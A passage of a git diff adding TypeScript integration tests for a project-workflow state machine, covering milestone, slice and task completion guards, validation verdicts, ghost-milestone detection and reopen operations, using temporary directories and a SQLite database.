+    assert.equal(isAcceptableUatVerdict("partial", "artifact-driven"), false, "partial with artifact-driven → not acceptable");
+  });
+
+  test("milestone validation verdict schema validation", () => {
+    assert.equal(isValidMilestoneVerdict("pass"), true);
+    assert.equal(isValidMilestoneVerdict("needs-attention"), true);
+    assert.equal(isValidMilestoneVerdict("needs-remediation"), true);
+    assert.equal(isValidMilestoneVerdict("fail"), false, "fail is not a valid milestone verdict");
+    assert.equal(isValidMilestoneVerdict(""), false);
+    assert.equal(isValidMilestoneVerdict("unknown"), false);
+  });
+
+  test("all slices done + no VALIDATION → validating-milestone (not completing)", async () => {
+    base = createFullFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "complete" });
+    insertSlice({ id: "S02", milestoneId: "M001", title: "Second", status: "complete" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+    insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", status: "complete" });
+    insertTask({ id: "T01", sliceId: "S02", milestoneId: "M001", status: "complete" });
+
+    invalidateAllCaches();
+    const state = await deriveStateFromDb(base);
+    assert.equal(
+      state.phase,
+      "validating-milestone",
+      "all slices done without VALIDATION should be validating-milestone",
+    );
+  });
+
+  test("all slices done + terminal VALIDATION + no SUMMARY → completing-milestone", async () => {
+    base = createFullFixture();
+    writeFileSync(
+      join(base, ".gsd", "milestones", "M001", "M001-VALIDATION.md"),
+      "---\nverdict: pass\n---\n# Validation\nPassed.\n",
+    );
+
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "complete" });
+    insertSlice({ id: "S02", milestoneId: "M001", title: "Second", status: "complete" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+    insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", status: "complete" });
+    insertTask({ id: "T01", sliceId: "S02", milestoneId: "M001", status: "complete" });
+
+    invalidateAllCaches();
+    const state = await deriveStateFromDb(base);
+    assert.equal(
+      state.phase,
+      "completing-milestone",
+      "terminal VALIDATION without SUMMARY should be completing-milestone",
+    );
+  });
+
+  test("extractVerdict: markdown body fallback works", () => {
+    // When LLM writes verdict in body instead of frontmatter (#2960)
+    assert.equal(extractVerdict("# Validation\n\n**Verdict:** PASS"), "pass");
+    assert.equal(extractVerdict("# Validation\n\n**Verdict:** ✅ PASS"), "pass");
+    assert.equal(extractVerdict("# Validation\n\n**Verdict** needs-remediation"), "needs-remediation");
+  });
+
+  test("extractVerdict: normalizes 'passed' to 'pass'", () => {
+    assert.equal(extractVerdict("---\nverdict: passed\n---"), "pass");
+    assert.equal(extractVerdict("**Verdict:** passed"), "pass");
+  });
+
+  test("isClosedStatus: boundary values", () => {
+    assert.equal(isClosedStatus("complete"), true);
+    assert.equal(isClosedStatus("done"), true);
+    assert.equal(isClosedStatus("skipped"), true);
+    assert.equal(isClosedStatus("active"), false);
+    assert.equal(isClosedStatus("pending"), false);
+    assert.equal(isClosedStatus("in_progress"), false);
+    assert.equal(isClosedStatus(""), false);
+    assert.equal(isClosedStatus("COMPLETE"), false, "case-sensitive: uppercase should be false");
+  });
+});
+
+// ─────────────────────────────────────────────────────────────────────────
+// SECTION 5: Ghost Milestone Edge Cases
+// ─────────────────────────────────────────────────────────────────────────
+
+describe("ghost milestone edge cases", () => {
+  let base: string;
+
+  afterEach(() => {
+    try { closeDatabase(); } catch { /* may not be open */ }
+    if (base) rmSync(base, { recursive: true, force: true });
+  });
+
+  test("empty directory with DB row is NOT a ghost (#2921)", () => {
+    base = makeTempDir();
+    const mDir = join(base, ".gsd", "milestones", "M001");
+    mkdirSync(mDir, { recursive: true });
+
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Queued", status: "active" });
+
+    assert.equal(isGhostMilestone(base, "M001"), false, "DB row means not a ghost");
+  });
+
+  test("empty directory with worktree is NOT a ghost (#2921)", () => {
+    base = makeTempDir();
+    const mDir = join(base, ".gsd", "milestones", "M001");
+    mkdirSync(mDir, { recursive: true });
+    // Simulate worktree existence
+    mkdirSync(join(base, ".gsd", "worktrees", "M001"), { recursive: true });
+
+    assert.equal(isGhostMilestone(base, "M001"), false, "worktree means not a ghost");
+  });
+
+  test("empty directory without DB or worktree IS a ghost", () => {
+    base = makeTempDir();
+    const mDir = join(base, ".gsd", "milestones", "M001");
+    mkdirSync(mDir, { recursive: true });
+
+    assert.equal(isGhostMilestone(base, "M001"), true, "no DB, no worktree, no files → ghost");
+  });
+
+  test("directory with only META.json is still a ghost", () => {
+    base = makeTempDir();
+    const mDir = join(base, ".gsd", "milestones", "M001");
+    mkdirSync(mDir, { recursive: true });
+    writeFileSync(join(mDir, "META.json"), '{"created":"2026-01-01"}');
+
+    assert.equal(isGhostMilestone(base, "M001"), true, "META.json alone → ghost");
+  });
+
+  test("ghost milestones are skipped in state derivation", async () => {
+    base = makeTempDir();
+    const gsdDir = join(base, ".gsd", "milestones");
+
+    // M001 is ghost — empty dir
+    mkdirSync(join(gsdDir, "M001"), { recursive: true });
+
+    // M002 is real — has CONTEXT-DRAFT
+    mkdirSync(join(gsdDir, "M002"), { recursive: true });
+    writeFileSync(join(gsdDir, "M002", "M002-CONTEXT-DRAFT.md"), "# Draft\nContent.\n");
+
+    invalidateAllCaches();
+    const state = await deriveState(base);
+    assert.equal(state.activeMilestone?.id, "M002", "ghost M001 skipped, M002 is active");
+  });
+});
+
+// ─────────────────────────────────────────────────────────────────────────
+// SECTION 6: Dispatch Guard Integration
+// ─────────────────────────────────────────────────────────────────────────
+
+describe("dispatch guard integration", () => {
+  let base: string;
+
+  afterEach(() => {
+    try { closeDatabase(); } catch { /* may not be open */ }
+    if (base) rmSync(base, { recursive: true, force: true });
+  });
+
+  test("skip_milestone_validation preference writes pass-through VALIDATION", async () => {
+    base = createFullFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "complete" });
+    insertSlice({ id: "S02", milestoneId: "M001", title: "Second", status: "complete" });
+    // Write slice SUMMARYs so the missing SUMMARY guard doesn't fire
+    writeFileSync(
+      join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-SUMMARY.md"),
+      "# S01 Summary\nDone.\n",
+    );
+    writeFileSync(
+      join(base, ".gsd", "milestones", "M001", "slices", "S02", "S02-SUMMARY.md"),
+      "# S02 Summary\nDone.\n",
+    );
+
+    const ctx = buildDispatchCtx(base, "M001", {
+      phase: "validating-milestone",
+      activeSlice: null,
+      activeTask: null,
+    });
+    ctx.prefs = { phases: { skip_milestone_validation: true } } as any;
+
+    const result = await resolveDispatch(ctx);
+    assert.equal(result.action, "skip", "skip_milestone_validation should produce skip action");
+
+    // Should have written a pass-through VALIDATION file
+    const validationPath = join(base, ".gsd", "milestones", "M001", "M001-VALIDATION.md");
+    assert.ok(existsSync(validationPath), "VALIDATION file should be written");
+    const content = readFileSync(validationPath, "utf-8");
+    assert.ok(content.includes("verdict: pass"), "should contain pass verdict");
+    assert.ok(content.includes("skipped by preference"), "should note it was skipped");
+  });
+
+  test("rewrite-docs circuit breaker: exceeding MAX attempts resolves all overrides", async () => {
+    base = createFullFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+
+    // Write a rewrite count at the max
+    const runtimeDir = join(base, ".gsd", "runtime");
+    mkdirSync(runtimeDir, { recursive: true });
+    writeFileSync(
+      join(runtimeDir, "rewrite-count.json"),
+      JSON.stringify({ count: 3, updatedAt: new Date().toISOString() }),
+    );
+
+    // Import and check
+    const { getRewriteCount } = await import("../../auto-dispatch.ts");
+    assert.equal(getRewriteCount(base), 3, "rewrite count should be 3");
+  });
+
+  test("replanning-slice with null activeSlice → stop (error)", async () => {
+    base = createFullFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+
+    const ctx = buildDispatchCtx(base, "M001", {
+      phase: "replanning-slice",
+      activeSlice: null,
+      activeTask: null,
+    });
+
+    const result = await resolveDispatch(ctx);
+    assert.equal(result.action, "stop", "replanning without activeSlice should stop");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/integration/state-machine-live-validation.test.ts b/src/resources/extensions/gsd/tests/integration/state-machine-live-validation.test.ts
new file mode 100644
index 000000000..9b094578e
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/state-machine-live-validation.test.ts
@@ -0,0 +1,957 @@
+/**
+ * state-machine-live-validation.test.ts — Live operational validation of the
+ * GSD state machine with real handlers, real DB, and real filesystem.
+ *
+ * Exercises every phase transition, completion guard, edge case, and reopen
+ * path end-to-end. This is NOT a unit test — it drives the actual tool handlers
+ * against a real temp directory with a real SQLite database.
+ *
+ * Findings reference: #3161 (state machine validation report)
+ */
+
+// GSD State Machine Live Validation (#3161)
+
+
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import {
+  mkdtempSync,
+  mkdirSync,
+  writeFileSync,
+  readFileSync,
+  rmSync,
+  existsSync,
+} from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+
+// ── DB layer ──────────────────────────────────────────────────────────────
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  getTask,
+  getSlice,
+  getMilestone,
+  getSliceTasks,
+  getMilestoneSlices,
+  updateTaskStatus,
+  updateSliceStatus,
+  updateMilestoneStatus,
+} from "../../gsd-db.ts";
+
+// ── Tool handlers ─────────────────────────────────────────────────────────
+import { handleCompleteTask } from "../../tools/complete-task.ts";
+import { handleCompleteSlice } from "../../tools/complete-slice.ts";
+import { handleCompleteMilestone } from "../../tools/complete-milestone.ts";
+import { handleReopenTask } from "../../tools/reopen-task.ts";
+import { handleReopenSlice } from "../../tools/reopen-slice.ts";
+
+// ── State derivation ──────────────────────────────────────────────────────
+import {
+  deriveState,
+  deriveStateFromDb,
+  invalidateStateCache,
+  isGhostMilestone,
+} from "../../state.ts";
+
+// ── Status guards ─────────────────────────────────────────────────────────
+import { isClosedStatus } from "../../status-guards.ts";
+
+// ── Events ────────────────────────────────────────────────────────────────
+import { readEvents } from "../../workflow-events.ts";
+
+// ── Cache invalidation ───────────────────────────────────────────────────
+import { invalidateAllCaches } from "../../cache.ts";
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Fixture Helpers
+// ═══════════════════════════════════════════════════════════════════════════
+
+function makeTempDir(): string {
+  return mkdtempSync(join(tmpdir(), "gsd-live-validation-"));
+}
+
+/**
+ * Create a realistic .gsd/ fixture with:
+ * - M001 milestone with ROADMAP, CONTEXT
+ * - S01 slice with PLAN (2 tasks T01, T02)
+ * - S02 slice with PLAN (1 task T01)
+ * - Task PLAN stubs for each task
+ * - REQUIREMENTS.md and DECISIONS.md
+ */
+function createFullFixture(): string {
+  const base = makeTempDir();
+  const gsdDir = join(base, ".gsd");
+  const m001Dir = join(gsdDir, "milestones", "M001");
+  const s01Dir = join(m001Dir, "slices", "S01");
+  const s01Tasks = join(s01Dir, "tasks");
+  const s02Dir = join(m001Dir, "slices", "S02");
+  const s02Tasks = join(s02Dir, "tasks");
+
+  mkdirSync(s01Tasks, { recursive: true });
+  mkdirSync(s02Tasks, { recursive: true });
+
+  // CONTEXT.md — needed to get past needs-discussion
+  writeFileSync(
+    join(m001Dir, "M001-CONTEXT.md"),
+    [
+      "# M001: Live Validation Milestone",
+      "",
+      "## Purpose",
+      "Validate the state machine end-to-end.",
+    ].join("\n"),
+  );
+
+  // ROADMAP.md
+  writeFileSync(
+    join(m001Dir, "M001-ROADMAP.md"),
+    [
+      "# M001: Live Validation Milestone",
+      "",
+      "## Vision",
+      "Prove state machine correctness.",
+      "",
+      "## Success Criteria",
+      "- All operations succeed",
+      "",
+      "## Slices",
+      "",
+      "- [ ] **S01: First Feature** `risk:low` `depends:[]`",
+      "  - After this: First feature proven.",
+      "",
+      "- [ ] **S02: Second Feature** `risk:low` `depends:[]`",
+      "  - After this: Second feature proven.",
+      "",
+      "## Boundary Map",
+      "",
+      "| From | To | Produces | Consumes |",
+      "|------|----|----------|----------|",
+      "| S01 | terminal | feature-a | nothing |",
+      "| S02 | terminal | feature-b | nothing |",
+    ].join("\n"),
+  );
+
+  // S01 PLAN
+  writeFileSync(
+    join(s01Dir, "S01-PLAN.md"),
+    [
+      "# S01: First Feature",
+      "",
+      "**Goal:** Implement first feature.",
+      "",
+      "## Tasks",
+      "",
+      "- [ ] **T01: Implementation** `est:30m`",
+      "  - Do: Build it",
+      "  - Verify: Run tests",
+      "",
+      "- [ ] **T02: Testing** `est:30m`",
+      "  - Do: Write tests",
+      "  - Verify: Run tests",
+    ].join("\n"),
+  );
+
+  // S01 task plan stubs
+  writeFileSync(join(s01Tasks, "T01-PLAN.md"), "# T01 Plan\nImplement.\n");
+  writeFileSync(join(s01Tasks, "T02-PLAN.md"), "# T02 Plan\nTest.\n");
+
+  // S02 PLAN
+  writeFileSync(
+    join(s02Dir, "S02-PLAN.md"),
+    [
+      "# S02: Second Feature",
+      "",
+      "**Goal:** Implement second feature.",
+      "",
+      "## Tasks",
+      "",
+      "- [ ] **T01: Implementation** `est:30m`",
+      "  - Do: Build it",
+      "  - Verify: Run tests",
+    ].join("\n"),
+  );
+
+  // S02 task plan stub
+  writeFileSync(join(s02Tasks, "T01-PLAN.md"), "# T01 Plan\nBuild.\n");
+
+  // REQUIREMENTS.md
+  writeFileSync(
+    join(gsdDir, "REQUIREMENTS.md"),
+    [
+      "# Requirements",
+      "",
+      "## Active",
+      "",
+      "| ID | Description | Owner |",
+      "|----|-------------|-------|",
+      "| R001 | Feature works | S01 |",
+    ].join("\n"),
+  );
+
+  // DECISIONS.md
+  writeFileSync(
+    join(gsdDir, "DECISIONS.md"),
+    [
+      "# Decisions",
+      "",
+      "| ID | Decision | Choice | Rationale |",
+      "|----|----------|--------|-----------|",
+    ].join("\n"),
+  );
+
+  return base;
+}
+
+function makeTaskParams(
+  taskId: string,
+  sliceId: string,
+  milestoneId: string,
+  overrides?: Partial<Record<string, unknown>>,
+): Record<string, unknown> {
+  return {
+    taskId,
+    sliceId,
+    milestoneId,
+    oneLiner: `Completed ${taskId}`,
+    narrative: `Implemented ${taskId} with full coverage.`,
+    verification: "All tests pass.",
+    keyFiles: ["src/feature.ts"],
+    keyDecisions: [],
+    deviations: "None.",
+    knownIssues: "None.",
+    blockerDiscovered: false,
+    verificationEvidence: [
+      { command: "npm test", exitCode: 0, verdict: "pass", durationMs: 1000 },
+    ],
+    ...overrides,
+  };
+}
+
+function makeSliceParams(
+  sliceId: string,
+  milestoneId: string,
+): Record<string, unknown> {
+  return {
+    sliceId,
+    milestoneId,
+    sliceTitle: `${sliceId} Feature`,
+    oneLiner: `${sliceId} proven`,
+    narrative: "All tasks completed.",
+    verification: "Tests pass.",
+    keyFiles: ["src/feature.ts"],
+    keyDecisions: [],
+    patternsEstablished: [],
+    observabilitySurfaces: [],
+    deviations: "None.",
+    knownLimitations: "None.",
+    followUps: "None.",
+    requirementsAdvanced: [],
+    requirementsValidated: [],
+    requirementsSurfaced: [],
+    requirementsInvalidated: [],
+    filesModified: [{ path: "src/feature.ts", description: "Feature" }],
+    uatContent: "Acceptance criteria met.",
+    provides: ["feature"],
+    requires: [],
+    affects: [],
+    drillDownPaths: [],
+  };
+}
+
+function makeMilestoneParams(milestoneId: string): Record<string, unknown> {
+  return {
+    milestoneId,
+    title: "Live Validation Milestone",
+    oneLiner: "Milestone proven end-to-end",
+    narrative: "All slices completed and verified.",
+    successCriteriaResults: "All criteria met.",
+    definitionOfDoneResults: "All items checked.",
+    requirementOutcomes: "All requirements satisfied.",
+    keyDecisions: ["Chose approach A"],
+    keyFiles: ["src/feature.ts"],
+    lessonsLearned: ["Integration testing is valuable"],
+    followUps: "None.",
+    deviations: "None.",
+    verificationPassed: true,
+  };
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Test Suite
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe("state-machine-live-validation", () => {
+  let base: string;
+
+  afterEach(() => {
+    closeDatabase();
+    if (base) rmSync(base, { recursive: true, force: true });
+  });
+
+  // ─────────────────────────────────────────────────────────────────────────
+  // PHASE 1: Full happy-path lifecycle
+  // ─────────────────────────────────────────────────────────────────────────
+
+  describe("happy path: full lifecycle M001 → complete", () => {
+    test("step 1: empty project derives pre-planning", async () => {
+      base = makeTempDir();
+      mkdirSync(join(base, ".gsd", "milestones"), { recursive: true });
+      const state = await deriveState(base);
+      assert.equal(state.phase, "pre-planning");
+      assert.equal(state.activeMilestone, null);
+    });
+
+    test("step 2: milestone with CONTEXT-DRAFT derives needs-discussion", async () => {
+      base = makeTempDir();
+      const mDir = join(base, ".gsd", "milestones", "M001");
+      mkdirSync(mDir, { recursive: true });
+      writeFileSync(join(mDir, "M001-CONTEXT-DRAFT.md"), "# Draft\nDraft context.\n");
+      invalidateStateCache();
+      const state = await deriveState(base);
+      assert.equal(state.phase, "needs-discussion");
+      assert.equal(state.activeMilestone?.id, "M001");
+    });
+
+    test("step 3: full fixture with ROADMAP+PLAN derives planning or executing", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      invalidateStateCache();
+      const state = await deriveState(base);
+      // Without DB migration, filesystem path is used — should be planning or executing
+      assert.ok(
+        ["planning", "executing", "pre-planning"].includes(state.phase),
+        `expected planning/executing/pre-planning, got: ${state.phase}`,
+      );
+    });
+
+    test("step 4: complete T01 in S01 — handler succeeds, DB reflects completion", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      // Seed DB with hierarchy
+      insertMilestone({ id: "M001", title: "Live Validation", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "First Feature", status: "in_progress" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "Implementation", status: "pending" });
+      insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", title: "Testing", status: "pending" });
+
+      const result = await handleCompleteTask(makeTaskParams("T01", "S01", "M001") as any, base);
+      assert.ok(!("error" in result), `expected success, got: ${JSON.stringify(result)}`);
+
+      // Verify DB state
+      const task = getTask("M001", "S01", "T01");
+      assert.ok(task, "T01 should exist in DB");
+      assert.ok(isClosedStatus(task!.status), `T01 status should be closed, got: ${task!.status}`);
+
+      // Verify SUMMARY.md written to disk
+      const summaryPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks", "T01-SUMMARY.md");
+      assert.ok(existsSync(summaryPath), "T01-SUMMARY.md should exist on disk");
+
+      // Verify event log entry
+      const events = readEvents(join(base, ".gsd", "event-log.jsonl"));
+      const taskEvent = events.find(e => e.cmd === "complete-task" && (e.params as any).taskId === "T01");
+      assert.ok(taskEvent, "event log should contain complete-task for T01");
+    });
+
+    test("step 5: complete T02 in S01 — both tasks now done", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Live Validation", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "First Feature", status: "in_progress" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "Implementation", status: "complete" });
+      insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", title: "Testing", status: "pending" });
+
+      const result = await handleCompleteTask(makeTaskParams("T02", "S01", "M001") as any, base);
+      assert.ok(!("error" in result), `expected success, got: ${JSON.stringify(result)}`);
+
+      // Both tasks complete
+      const tasks = getSliceTasks("M001", "S01");
+      assert.equal(tasks.length, 2);
+      assert.ok(tasks.every(t => isClosedStatus(t.status)), "all tasks should be closed");
+    });
+
+    test("step 6: complete slice S01 — all tasks done, slice closes", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Live Validation", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "First Feature", status: "in_progress" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "Impl", status: "complete" });
+      insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", title: "Test", status: "complete" });
+
+      const result = await handleCompleteSlice(makeSliceParams("S01", "M001") as any, base);
+      assert.ok(!("error" in result), `expected success, got: ${JSON.stringify(result)}`);
+
+      const slice = getSlice("M001", "S01");
+      assert.ok(slice, "S01 should exist");
+      assert.ok(isClosedStatus(slice!.status), `S01 should be closed, got: ${slice!.status}`);
+
+      // SUMMARY.md on disk
+      const summaryPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-SUMMARY.md");
+      assert.ok(existsSync(summaryPath), "S01-SUMMARY.md should exist");
+    });
+
+    test("step 7: complete S02 task + slice — both slices done", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Live Validation", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "complete" });
+      insertSlice({ id: "S02", milestoneId: "M001", title: "Second", status: "in_progress" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "Impl", status: "complete" });
+      insertTask({ id: "T01", sliceId: "S02", milestoneId: "M001", title: "Impl", status: "pending" });
+
+      // Complete task
+      const taskResult = await handleCompleteTask(makeTaskParams("T01", "S02", "M001") as any, base);
+      assert.ok(!("error" in taskResult), `task: ${JSON.stringify(taskResult)}`);
+
+      // Complete slice
+      const sliceResult = await handleCompleteSlice(makeSliceParams("S02", "M001") as any, base);
+      assert.ok(!("error" in sliceResult), `slice: ${JSON.stringify(sliceResult)}`);
+
+      // Both slices complete
+      const slices = getMilestoneSlices("M001");
+      assert.ok(slices.length >= 2, "should have 2+ slices");
+      assert.ok(slices.every(s => isClosedStatus(s.status)), "all slices should be closed");
+    });
+
+    test("step 8: complete milestone M001 — full lifecycle done", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Live Validation", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "complete" });
+      insertSlice({ id: "S02", milestoneId: "M001", title: "Second", status: "complete" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "Impl", status: "complete" });
+      insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", title: "Test", status: "complete" });
+      insertTask({ id: "T01", sliceId: "S02", milestoneId: "M001", title: "Impl", status: "complete" });
+
+      const result = await handleCompleteMilestone(makeMilestoneParams("M001") as any, base);
+      assert.ok(!("error" in result), `expected success, got: ${JSON.stringify(result)}`);
+
+      const milestone = getMilestone("M001");
+      assert.ok(milestone, "M001 should exist");
+      assert.ok(isClosedStatus(milestone!.status), `M001 should be closed, got: ${milestone!.status}`);
+
+      // SUMMARY.md on disk
+      const summaryPath = join(base, ".gsd", "milestones", "M001", "M001-SUMMARY.md");
+      assert.ok(existsSync(summaryPath), "M001-SUMMARY.md should exist");
+    });
+  });
+
+  // ─────────────────────────────────────────────────────────────────────────
+  // PHASE 2: Completion guard edge cases
+  // ─────────────────────────────────────────────────────────────────────────
+
+  describe("completion guards — edge cases", () => {
+    test("cannot complete task with empty taskId", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      const result = await handleCompleteTask(makeTaskParams("", "S01", "M001") as any, base);
+      assert.ok("error" in result);
+      assert.match((result as any).error, /taskId is required/);
+    });
+
+    test("cannot complete task in closed milestone", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Done", status: "complete" });
+      insertSlice({ id: "S01", milestoneId: "M001" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+      const result = await handleCompleteTask(makeTaskParams("T01", "S01", "M001") as any, base);
+      assert.ok("error" in result);
+      assert.match((result as any).error, /closed milestone/);
+    });
+
+    test("cannot complete task in closed slice", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", status: "complete" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+      const result = await handleCompleteTask(makeTaskParams("T01", "S01", "M001") as any, base);
+      assert.ok("error" in result);
+      assert.match((result as any).error, /closed slice/);
+    });
+
+    test("double task completion returns error (H5-related)", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", status: "in_progress" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+
+      const result = await handleCompleteTask(makeTaskParams("T01", "S01", "M001") as any, base);
+      assert.ok("error" in result);
+      assert.match((result as any).error, /already complete/);
+    });
+
+    test("cannot complete slice with zero tasks — vacuous truth guard", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", status: "in_progress" });
+      // No tasks inserted
+
+      const result = await handleCompleteSlice(makeSliceParams("S01", "M001") as any, base);
+      assert.ok("error" in result);
+      assert.match((result as any).error, /no tasks found/);
+    });
+
+    test("cannot complete slice with incomplete tasks", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", status: "in_progress" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+      insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+      const result = await handleCompleteSlice(makeSliceParams("S01", "M001") as any, base);
+      assert.ok("error" in result);
+      assert.match((result as any).error, /incomplete tasks/);
+    });
+
+    test("double slice completion returns error", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", status: "complete" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+
+      const result = await handleCompleteSlice(makeSliceParams("S01", "M001") as any, base);
+      assert.ok("error" in result);
+      assert.match((result as any).error, /already complete/);
+    });
+
+    test("cannot complete milestone with zero slices", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+
+      const result = await handleCompleteMilestone(makeMilestoneParams("M001") as any, base);
+      assert.ok("error" in result);
+      assert.match((result as any).error, /no slices found/);
+    });
+
+    test("cannot complete milestone with incomplete slices", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", status: "complete" });
+      insertSlice({ id: "S02", milestoneId: "M001", status: "in_progress" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+      insertTask({ id: "T01", sliceId: "S02", milestoneId: "M001", status: "pending" });
+
+      const result = await handleCompleteMilestone(makeMilestoneParams("M001") as any, base);
+      assert.ok("error" in result);
+      assert.match((result as any).error, /incomplete slices/);
+    });
+
+    test("cannot complete milestone with incomplete tasks in complete slice (deep check)", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      // Slice marked complete but task is still pending — simulates inconsistent state
+      insertSlice({ id: "S01", milestoneId: "M001", status: "complete" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+      const result = await handleCompleteMilestone(makeMilestoneParams("M001") as any, base);
+      assert.ok("error" in result);
+      assert.match((result as any).error, /incomplete tasks/);
+    });
+
+    test("cannot complete milestone without verificationPassed=true", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", status: "complete" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+
+      const params = makeMilestoneParams("M001");
+      params.verificationPassed = false;
+      const result = await handleCompleteMilestone(params as any, base);
+      assert.ok("error" in result);
+      assert.match((result as any).error, /verification did not pass/);
+    });
+
+    test("double milestone completion returns error", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Done", status: "complete" });
+      insertSlice({ id: "S01", milestoneId: "M001", status: "complete" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+
+      const result = await handleCompleteMilestone(makeMilestoneParams("M001") as any, base);
+      assert.ok("error" in result);
+      assert.match((result as any).error, /already complete/);
+    });
+  });
+
+  // ─────────────────────────────────────────────────────────────────────────
+  // PHASE 3: Reopen operations
+  // ─────────────────────────────────────────────────────────────────────────
+
+  describe("reopen operations", () => {
+    test("reopen task: resets completed task to pending", async () => {
+      base = createFullFixture();
+      openDatabase(join(base, ".gsd", "gsd.db"));
+      insertMilestone({ id: "M001", title: "Active", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", status: "in_progress" });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+
+      const result = await handleReopenTask(
